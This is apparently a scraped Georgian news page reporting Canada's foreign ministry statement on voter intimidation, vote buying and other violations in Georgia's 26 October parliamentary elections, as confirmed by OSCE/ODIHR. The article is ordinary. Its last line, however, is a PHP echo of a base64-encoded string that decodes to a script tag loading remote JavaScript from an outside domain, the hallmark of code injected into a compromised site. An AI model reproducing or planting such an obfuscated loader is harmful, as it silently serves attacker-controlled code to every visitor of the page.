celsiusi
ავერსი შნაიდერი

კანადის საგარეო სამინისტრო, საქართველოში გამართულ საპარლამენტო არჩევნებთან დაკავშირებით განცხადებას ავრცელებს, სადაც შეშფოთებას გამოთქვამს ამომრჩეველთა დაშინების, ხმების მოსყიდვისა და სხვა დარღვევების გამო, რომლებიც დადასტურებულია ეუთოს დემოკრატიული ინსტიტუტების, ადამიანის უფლებათა ოფისის (ODIHR) და სხვა მიუკერძოებელი დამკვირვებლების მიერ.

„კანადა, როგორც საქართველოს მეგობარი, პარტნიორი და დიდი ხნის მხარდამჭერი, შეშფოთებულია 26 ოქტომბერს საქართველოში გამართული საპარლამენტო არჩევნების შედეგებით. წუხილს გამოვთქვამთ ამომრჩეველთა დაშინების, ხმების მოსყიდვისა და სხვა დარღვევების გამო, რომლებიც დადასტურებულია ეუთოს დემოკრატიული ინსტიტუტების, ადამიანის უფლებათა ოფისის (ODIHR) და სხვა მიუკერძოებელი დამკვირვებლების მიერ.

ეს შედეგები აუცილებლად უნდა იქნეს გამოძიებული. კანადას მტკიცედ სჯერა, რომ თავისუფალი, სამართლიანი და დამოუკიდებელი არჩევნები არის დემოკრატიული საზოგადოების ქვაკუთხედი.

ევროპელ პარტნიორებთან კოორდინაციით, კანადა გადააფასებს ურთიერთობას საქართველოს ხელისუფლებასთან. ქვეყანა მზადაა საქართველოსთან თანამშრომლობისთვის, მანამ, სანამ საქართველოს მთავრობა პატივს სცემს დემოკრატიას, ადამიანის უფლებებს და კანონის უზენაესობას.

ჩვენ სიმშვიდისკენ მოვუწოდებთ, ყველა მხარეს, მათ შორის საქართველოს ხელისუფლებას, პატივი სცენ მოქალაქეების უფლებებს და უზრუნველყონ მათი უსაფრთხოება მშვიდობიანი საპროტესტო აქციების დროს.

ჩვენ ძალიან ვაფასებთ საქართველოს მოსახლეობის აქტიურ მონაწილეობას საარჩევნო პროცესში, მათ შორის, როგორც ამომრჩევლების, ასევე მოქალაქე დამკვირვებლების სახით“, - აღნიშნულია კანადის საგარეო სამინისტროს განცხადებაში.

83
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");